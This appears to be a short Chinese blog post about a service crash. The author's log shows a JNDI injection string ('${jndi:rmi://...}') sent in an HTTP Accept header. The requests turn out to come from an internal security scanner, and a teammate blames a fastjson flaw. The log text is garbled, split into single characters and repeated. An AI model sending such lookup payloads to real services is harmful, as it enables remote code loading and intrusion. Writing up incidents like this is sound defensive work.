以前不太知道jndi是什么,直到有一次服务挂了,看日志发现有类似请求,然后服务就挂了。
详细信息:
org.springframework.web.HttpMediaTypeNotAcceptableException: Could not parse ‘Accept’ header [
j
n
d
i
:
r
m
i
:
/
/
192.168.0.1
:
12346
/
i
/
h
c
S
v
q
I
7
U
/
68465
c
/
7
u
q
i
/
f
w
x
v
/
P
Q
5
P
8
i
B
h
/
]
:
I
n
v
a
l
i
d
m
i
m
e
t
y
p
e
"
{jndi:rmi://192.168.0.1:12346/i/hcSvqI7U/68465c/7uqi/fwxv/PQ5P8iBh/}]: Invalid mime type "
jndi:rmi://192.168.0.1:12346/i/hcSvqI7U/68465c/7uqi/fwxv/PQ5P8iBh/]:Invalidmimetype"{jndi:rmi://192.168.0.1:12346/i/hcSvqI7U/68465c/7uqi/fwxv/PQ5P8iBh/}": Invalid token character ‘{’ in token “${jndi:rmi:”
注:实际ip用192.168.0.1代替了啊,懂的都懂。
后来发现这个ip正是安扫的调用方,在模拟攻击请求。
一开始没太注意,有经验的队友见过这个问题,知道这个是jndi利用fastjson的漏洞进行注入。
todo 模拟一次实际的注入并造成服务挂掉
什么情况下需要注意
当有大量不认识的ip请求过来时,就要追查下ip的来源了。
发现服务挂掉同时伴随着大量的未知ip的骑牛,也是安扫的。